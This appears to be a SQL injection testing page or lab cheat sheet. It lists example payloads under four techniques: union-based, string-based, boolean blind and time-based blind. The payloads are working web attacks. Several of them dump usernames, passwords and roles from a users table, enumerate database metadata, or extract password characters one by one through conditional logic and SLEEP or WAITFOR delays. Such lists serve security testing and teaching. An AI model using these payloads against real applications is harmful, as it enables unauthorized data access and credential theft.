SQL Injection Test

1. Union-Based SQL Injection

Test union-based SQL injection for data extraction

Example Payloads:
• 1 UNION SELECT 1,2,3,4,5,6
• 1 UNION SELECT null,username,password,email,role,null FROM users
• 1 UNION SELECT 1,database(),user(),version(),5,6
• 1 UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables
• -1 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6 FROM users

2. String-Based SQL Injection

Test string-based SQL injection in search functionality

Example Payloads:
• admin' OR '1'='1
• ' OR 1=1 --
• ' UNION SELECT 1,2,3,4,5,6 --
• ' UNION SELECT null,username,password,email,role,null FROM users --
• ' AND 1=0 UNION SELECT null,@@version,null,null,null,null --

3. Blind SQL Injection

Test boolean-based blind SQL injection

Example Payloads:
• 1 AND 1=1
• 1 AND 1=2
• 1 AND (SELECT COUNT(*) FROM users)>0
• 1 AND (SELECT LENGTH(password) FROM users WHERE id=1)>5
• 1 AND SUBSTRING((SELECT password FROM users WHERE id=1),1,1)='a'

4. Time-Based Blind SQL Injection

Test time-based blind SQL injection

Example Payloads:
• 1 AND SLEEP(5)
• 1 AND IF(1=1,SLEEP(5),0)
• 1 AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)
• 1 AND IF(SUBSTRING((SELECT password FROM users WHERE id=1),1,1)='a',SLEEP(5),0)
• 1; WAITFOR DELAY '00:00:05' -- (SQL Server)

🎯 SQL Injection Testing

1. Union-Based SQL Injection

2. String-Based SQL Injection

3. Blind SQL Injection

4. Time-Based Blind SQL Injection